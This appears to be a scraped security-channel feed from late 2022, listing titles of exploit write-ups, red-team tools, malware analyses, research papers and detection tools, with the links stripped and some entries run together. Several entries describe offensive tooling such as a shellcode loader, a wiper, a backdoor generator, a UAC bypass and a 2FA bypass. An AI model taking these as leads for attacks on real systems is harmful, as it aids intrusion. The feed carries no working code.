#Red_Team_Tactics1. StealthHook - A method for hooking a function without modifying memory protection Frida script to bypass common methods of sslpining Android pipe_buffer arbitrary read write
2022-12-13 03:12:32
#exploit1. Exploiting CVE-2022-42703 - Bringing back the stack attack CVE-2022-36537:ZK Framework - Exposure of Sensitive Information to an Unauthorized Actor
2022-12-12 14:41:29
2022-12-12 13:06:08
Fuzzing ping(8)…and finding a 24 year old bug December 11, 2022 at 09:57AM by Gallusvia reddit
2022-12-06 03:04:38
#hardening"Hardening with Scapolite: a DevOps-based Approach for Improved Authoring and Testing of Security-Configuration Guides in Large Scale Organizations", 2022.
2022-12-06 03:04:37
#Tech_book"Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence", 2022.
2022-12-06 03:04:36
#reversing"Exploiting Branch Target Injection", 2021.
2022-12-06 03:04:18
#Malware_analysisAnti-Reversing Techniques Part 1: 2:
2022-12-06 03:04:17
#Tech_book"Black Hat Python: Python Programming for Hackers and Pentesters, 2nd Edition", 2021.]-> Python 3 Source Code:
2022-12-06 03:04:16
#Threat_Research#Blue_Team_Techniques1. Threatest - CLI and Go framework for end-to-end testing threat detection rules Detect Tactics, Techniques & Combat Threats
2022-12-06 03:04:15
#Malware_analysis1. ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware Blowing Cobalt Strike Out of the Water With Memory Analysis
2022-12-05 20:33:20
#Research"HearMeOut: Detecting Voice Phishing Activities in Android", 2022.]-> Voice phishing behavior detection system in AOSP:
2022-12-05 20:32:11
2022-12-05 09:22:56
2022-12-05 08:26:31
Titan: A generic user defined reflective DLL for Cobalt Strike simple PoC to invoke an encrypted shellcode by using an hidden call is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques small wiper malware programmed in c# new target domains using Content Security Policy is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team collect assets and automatically perform SQL injection detection (plug-in automatic Bypass), XSS detection, RCE detection, and sensitive information detection Extract the login log on the domain controller or remotely, and quickly obtain the IP address corresponding to the domain user a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis! is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing
2022-12-05 08:25:45
Shennina Automating Host Exploitation with AI A care package of useful bofs for red team engagments is a forked and enhanced version of TinyCheck. SpyGuard's main objective is to detect signs of compromise by monitoring network flows transmitted by a device
2022-12-03 17:06:53
​⚜ List of Websites Giving free RDP/VPS ⚜🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀🌀
2022-12-03 13:13:17
2FA Bypass by @hackerscrolls
2022-12-02 21:53:44
2022-12-02 21:53:43
2022-12-01 18:59:00
#Research"Backporting Security Patches of Web Applications: A Prototype Design and Implementation on Injection Vulnerability Patches", 2022.
2022-12-01 18:58:57
#Fuzzing"SnapFuzz: An Efficient Fuzzing Framework for Network Applications", 2022.]->
2022-12-01 18:58:56
#Malware_analysis1. New details on commercial spyware vendor Variston HiveV5 file decryptor PoC
2022-12-01 18:56:41
#Cloud_SecurityA Detailed Talk about K8S Cluster Security from the Perspective of AttackersPart 1: 2:
2022-12-01 18:56:40
#Blue_Team_TechniquesGet-InjectedThreadEx - Detecting Thread Creation Trampolines]-> PowerShell detection script:
2022-12-01 18:56:39
#reversingGuide to Reversing and Exploiting iOS binariesPart 3 - Heap Overflows on iOS ARM64: Spraying, UAF]-> Part 1, 2:
2022-12-01 18:56:38
#tools#OSINTCVE and PoC SearchBot v.0.3.5:- search and monitoring of new CVE;- search and monitoring of PoCs.
2022-12-01 18:56:37
#tools#Sec_code_reviewHeap_detective - detect heap memory pitfalls in C++/C
2022-12-01 18:56:35
#DFIREmotet Strikes Again - LNK File Leads to Domain Wide Ransomware
2022-12-01 13:16:15
Bypassing Web Application Firewalls December 01, 2022 at 04:51PM by ma-nivia reddit
2022-12-01 07:23:46
Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntu December 01, 2022 at 07:23AM by Gallusvia reddit
2022-12-01 01:59:31
Exploiting an N-day vBulletin PHP Object Injection Vulnerability #APTIran
2022-11-30 15:36:19
📕A Journey To Pwn And Own The Sonos One Speaker
2022-11-30 15:35:37
💥USA's Military Empire: A Visual Database Военные базы США распластались во многих частях Земли и это ни для кого не секрет, визуальная БД поможет понять визуально масштабы вмешательства вездесущей "Американской мечты" дерьмократии.#наЗлобуДня
2022-11-30 15:35:21
🔥Home Grown Red Team: Lateral Movement With Havoc C2 And Microsoft EDRLateral movement is extremely important for any red team engagement. Getting your initial shell is great, but if you can’t move off the box you could be dead in the water.
2022-11-30 09:09:04
Hive Ransomware v5-5.2 file decryption tool
2022-11-30 07:33:47
SGX.Fail - Overview of SGX Attacks November 30, 2022 at 07:59AM by Gallusvia reddit
2022-11-30 06:29:29
☃️Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet☃️➡️ Wireless Testing➡️ Networking➡️ Mobile App Testing much more...#oscp #bugbounty #activedirectory #redteaming #infosec #hacking #cybersecurity
2022-11-30 01:57:03
Xiongmai IoT Exploitation November 30, 2022 at 01:50AM by chicksdigthelongrunvia reddit
2022-11-29 17:03:04
Are you looking for OSINT books? In the overview below you will find various books about Open Source Intelligence (OSINT), Social Media Intelligence (SOCMINT), Privacy, Hacking, Red Teaming, Blue Teaming, Brand Protection, Automation and more! ▫️ security post uploader admin @hayper007
2022-11-29 15:20:57
​​BugBountyTips#BugBounty (Bypasses, Payloads, y más)
2022-11-29 12:00:18
​​otpOne Time Password utilities Go / GolangOne Time Passwords (OTPs) are an mechanism to improve security over passwords alone. When a Time-based OTP (TOTP) is stored on a user's phone, and combined with something the user knows (Password), you have an easy on-ramp to Multi-factor authentication without adding a dependency on a SMS provider. This Password and TOTP combination is used by many popular websites including Google, GitHub, Facebook, Salesforce and many others.The otp library enables you to easily add TOTPs to your own application, increasing your user's security against mass-password breaches and malware.
2022-11-29 12:00:17
#mobile #dfir
2022-11-29 04:03:56 leak leak igsample #hacker_bano_chutiya_nhe 👻👻
2022-11-28 17:37:00
2022-11-28 16:03:23
2022-11-28 13:41:43
🔥Mind the Gap The week before FirstCon22, Maddie gave an internal preview of her talk("0-day In-the-Wild Exploitation in 2022…so far"). Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).⚠️The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
2022-11-28 13:39:38
#Research"Investigating co-occurrences of MITRE ATT\&CK Techniques", 2022.
2022-11-28 13:39:37
#Infosec_StandardsNIST SP 800-215: "Guide to a Secure Enterprise Network Landscape", August 5, 2022.
2022-11-28 13:39:34
#DFIR#Blue_Team_TechniquesLinux Forensics
2022-11-28 13:39:33
#IoT_Security1. Vulnerabilities in BMC Firmware Affect OT/IoT Device Security IoT Security Administrator’s Guide
2022-11-28 13:39:32
#Cloud_SecurityA Azure Exploitation Toolkit for Red Team & Pentesters
2022-11-28 13:39:31
#tools#Offensive_security1. A terminal-based editor for PowerShell Cobalt Strike Community Kit - central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
2022-11-28 11:38:23
Containers: Rootful, Rootless, Privileged and Super Privileged.
2022-11-27 14:19:28
📌Manual SQL Injection Cheatsheet#bugbounty #infosec
2022-11-27 12:53:32
2022-11-27 12:02:06
💥NETGEAR R7800 AFPD PreAuth + PoC exploitA heap-buffer overflow in afpdʼs dsi_writeinit is leveraged to overwrite the proto_close function pointer in the DSI struct, and execute arbitrary code on the NETGEAR R7800 Smart Router, in the default configuration, on the LAN side, pre-auth.
2022-11-27 12:01:55
🔥Vulnerabilities in BMC Firmware Affect OT/IoT Device Security(part1)By abusing these vulnerabilities, an unauthenticated attacker may achieve RCE with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement.
2022-11-27 12:01:40
💥Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor NoticeNighthawk is a mature and advanced commercial C2 framework for lawful red team operations that is specifically built for detection evasion, and it does this well. While Proofpoint researchers are not aware of adoption of Nighthawk in the wild by attributed threat actors, it would be incorrect and dangerous to assume that this tool will never be appropriated by threat actors with a variety of intexfnts and purposes.🔥🔥🔥PoC of the removed registered LdrDllNotification for your enjoyment. 🔥🔥🔥PoC for utilizing RtlQueueWorkItem to load libraries
2022-11-26 17:01:32
2022-11-26 14:13:51
#Research"Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks", 2022.]->
2022-11-26 14:13:50
#Red_Team_Tactics1. Header spoofing via a hidden parameter in Facebook Batch GraphQL APIs UAC Bypass On Windows Defender For Endpoint With HighBorn
2022-11-26 14:13:49
#Research"SARA: Secure Android Remote Authorization", 2022.]-> Repo: